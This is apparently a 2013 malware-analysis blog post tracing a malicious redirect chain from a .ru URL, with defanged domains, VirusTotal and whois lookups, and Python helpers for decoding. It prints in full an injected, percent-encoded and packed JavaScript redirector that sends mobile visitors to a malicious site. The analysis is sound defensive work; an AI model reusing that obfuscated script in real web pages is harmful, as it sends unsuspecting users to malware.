The journey starts with a link from the urlquery.com website.

http://urlquery.net/report.php?id=2495895

This link tells us about a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL looks like a normal one if you ignore the .ru thing 🙂

When I tried to open this one in my browser, it redirected me to

https://www.google.com/search?q=wallmart

So I had to use wget to download this file.

After downloading this file I tried to open it in the browser and got the same redirection again. Grrr..

Let’s look at the response headers:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 16 May 2013 14:26:15 GMT
Content-Type: text/html
Connection: keep-alive
Last-Modified: Thu, 16 May 2013 14:03:59 GMT
ETag: "6bc8011-2e9-4dcd6567d31c0"
Accept-Ranges: bytes
Content-Length: 745

OK, so we know the website is not down and it is redirecting. Since we have the code, let’s take a look at the code that is redirecting us.

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
location.replace("h00p://virgin-altantic[dot]net/news/ask-index.php");//--></script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>
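As an added example (not code from the post), here is a small Python helper that statically pulls the redirect targets out of a landing page like the one above, covering both the `location.replace(...)` call and the `<noscript>` meta-refresh fallback, and checks that the two branches agree, which is what makes the page redirect whether or not JavaScript is enabled. The sample input is the snippet quoted above, kept defanged exactly as the post writes it, so nothing here touches the network.

```python
import re

# The landing-page snippet quoted above, kept defanged (h00p, [dot]) as the
# post writes it; this is the only input the script looks at.
SAMPLE_HTML = """<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
location.replace("h00p://virgin-altantic[dot]net/news/ask-index.php");//--></script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>
"""

# location.replace("..."), location.href = "...", window.location = "..."
JS_REDIRECT = re.compile(
    r"""(?:location\.replace\s*\(|(?:window\.)?location(?:\.href)?\s*=)\s*["']([^"']+)["']""",
    re.I,
)

# <meta http-equiv="refresh" content="0; url=...">
META_REFRESH = re.compile(
    r"""<meta[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*"""
    r"""content\s*=\s*["']\s*\d+\s*;\s*url\s*=\s*([^"'>\s]+)""",
    re.I,
)


def find_redirects(html: str) -> dict:
    """Return the redirect targets found in each branch of the page."""
    return {
        "script": JS_REDIRECT.findall(html),
        "meta": META_REFRESH.findall(html),
    }


def branches_agree(html: str) -> bool:
    """True when the script and noscript branches point at the same places,
    i.e. the page redirects with JavaScript enabled or disabled."""
    found = find_redirects(html)
    return bool(found["script"]) and set(found["script"]) == set(found["meta"])


if __name__ == "__main__":
    for kind, urls in find_redirects(SAMPLE_HTML).items():
        for url in urls:
            print(f"{kind:7s} -> {url}")
    print("script/noscript agree:", branches_agree(SAMPLE_HTML))
```

Running it on the snippet lists the same virgin-altantic[dot]net URL under both `script` and `meta`, so a desktop user with JavaScript disabled would be sent along just the same; the regexes are deliberately narrow and only cover the redirect idioms this page uses.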

Suspicious. OK, let’s see what VirusTotal says about this website.

https://www.virustotal.com/en/url/b9ae75bcf2d8bc16b2f14b1ca12eafb755ff6d18fb9beb4b3a9f877c8a4b177a/analysis/1368878313/

and

https://www.virustotal.com/en/url/3077275f26bf120619a28734abebf7d321efa8be0c43b6bb0954d5092337a873/analysis/1368878322/

The above two reports are for the URL I started with and for the other one,

h00p://polycontract[dot]ru

So, there is a redirection on every web page, which means I had to download everything using wget and then analyze it; no GUI, only code 😦

Two different analyses; anyway, the good thing is that they still show it is malicious 🙂

After downloading the 2nd file I analysed it and found out there are two JavaScript files in it.

So I downloaded those two files; the links were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these two files. The VirusTotal reports are

For core.js

https://www.virustotal.com/en/file/6f9229b2551587de22aa693b5da6e5ff350d521825b675a3549d0e09cccd67a1/analysis/1368878881/

For caption.js

https://www.virustotal.com/en/file/66b9077dc4b1c53d1d4bb7e9d3e333a5a3a3aae4b9d01f96b5c8d5c722208e94/analysis/1368878892/

Indeed they are malicious.

Time to take a look inside these two.

document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%
28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74
%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

The malicious code is the same in both files.

After decoding it, what I got is

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

which finally redirects you to

h00p://online2you[dot]org/search.php?sid=1
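To reproduce the two decoding steps described above (the unescape of the %XX blob, then the p,a,c,k,e,r packer that the page evaluates), here is an added Python example, not code from the post. It mirrors JavaScript's unescape() and then does what the packed function does in the browser: it rebuilds the token-to-word dictionary from the k list and substitutes every token of p in one pass. The packed call it runs on is a constructed sample of the same shape as the one above, with an assumed defanged target URL (example[dot]invalid); on the post's own blob you would feed the percent-encoded text through js_unescape() first. As the decoded code above shows, this is a mobile-device check: the script matches navigator.userAgent against a list of handset keywords and only then assigns document.location.href.

```python
import re

# Token alphabet of the packer's e() helper: 0-9 and a-z via toString(36),
# then A-Z via String.fromCharCode(c+29) for indices 36..61.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Matches the trailing call of the packer: }('<p>',<a>,<c>,'<k>'.split('|')
PACKED_CALL = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)",
    re.S,
)

# Constructed sample (not the post's blob): a packed call of the same shape,
# already percent-decoded, with an assumed defanged target URL.
SAMPLE_PACKED = (
    "<script type=\"text/javascript\">eval(function(p,a,c,k,e,r){"
    "/* packer body elided */return p}"
    "('0 1=2.3.4(/(5)|(6)/i);7(1){8.9.a=\"b\"}',62,19,"
    "'var|ismobile|navigator|userAgent|match|android|iphone|if|document"
    "|location|href|h00p://example[dot]invalid/|||||||'.split('|'),0,{}))"
    "</script>"
)


def js_unescape(s: str) -> str:
    """Mirror JavaScript's unescape(): decode %uXXXX and %XX to code points.

    urllib.parse.unquote would reassemble %XX runs as UTF-8; unescape does
    not, and matching the browser matters when the blob carries raw bytes.
    """
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def encode_token(n: int, base: int) -> str:
    """Reproduce e(c): the base-`base` token that stands for word index n."""
    if n < base:
        return ALPHABET[n]
    return encode_token(n // base, base) + ALPHABET[n % base]


def unpack(p: str, a: int, c: int, k: list) -> str:
    """Do what the packed function does in the browser: build the token ->
    word dictionary and replace every \\w+ token of p in a single pass."""
    words = {}
    for i in range(c):
        tok = encode_token(i, a)
        # An empty k entry means the word is its own token (e.g. the 'i'
        # regex flag, which the real list above keeps as an empty slot).
        words[tok] = k[i] if i < len(k) and k[i] else tok
    # A browser inserts the string "undefined" for a token missing from the
    # dictionary; leaving the token unchanged is more useful for analysis.
    return re.sub(r"\b\w+\b", lambda m: words.get(m.group(0), m.group(0)), p)


def unpack_eval(script: str) -> str:
    """Locate the eval(function(p,a,c,k,e,r){...}(...)) call in decoded
    script text and return the code it would hand to eval()."""
    m = PACKED_CALL.search(script)
    if not m:
        raise ValueError("no p,a,c,k,e,r call found")
    p, a, c, k = m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)
    # Undo the only JS string escapes these kits use inside p: \' and \\.
    p = p.replace("\\'", "'").replace("\\\\", "\\")
    return unpack(p, a, c, k.split("|"))


def redirect_target(js: str):
    """Pull the URL assigned to location.href out of unpacked code, if any."""
    m = re.search(r"""location\.href\s*=\s*["']([^"']+)["']""", js)
    return m.group(1) if m else None


if __name__ == "__main__":
    # On the real blob the first step would decode the %XX text; the sample
    # is already plain, so js_unescape() passes it through unchanged.
    code = unpack_eval(js_unescape(SAMPLE_PACKED))
    print(code)
    print("redirects to:", redirect_target(code))
```

A useful sanity check against the real list above: it has 122 entries, so the last index is 121, and encode_token(121, 62) returns "1X", which is exactly the token the packed code assigns to location.href (`1W="1X"`).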

The next task was to get the payload, as most probably this was the site where they had hidden the treasure.

But unfortunately this was down, with a 404 error:

h00p://online2you[dot]org/search.php?sid=1
Resolving online2you.org... 67.215.66.132
Connecting to online2you.org|67.215.66.132|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2013-05-18 17:44:43 ERROR 404: Not Found.

I thought, since there is redirection everywhere, this might be because of a different location, so I tried it with proxies in the US, Russia and 3-4 more countries, but got the same result every time.

Is it just me, or is everyone unable to download the contents from this site?

OK, let’s see the whois for the website.

whois for h00p://polycontract[dot]ru/

domain:        POLYCONTRACT.RU
nserver:       ns1.hosting.reg.ru.
nserver:       ns2.hosting.reg.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you: http://urlquery.net/report.php?id=1747064

whois for h00p://online2you[dot]org/

Domain ID:D168159997-LROR
Domain Name:ONLINE2YOU.ORG
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:OK
Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
remarks: Registration information: http://www.pir.org

And finally, a snapshot of all the files I have gathered:

[Screenshot: Screen Shot 2013-05-18 at 5.55.55 PM]

This was my journey, and this was the end.

Your inputs / criticism are required.

#MalwareMustDie
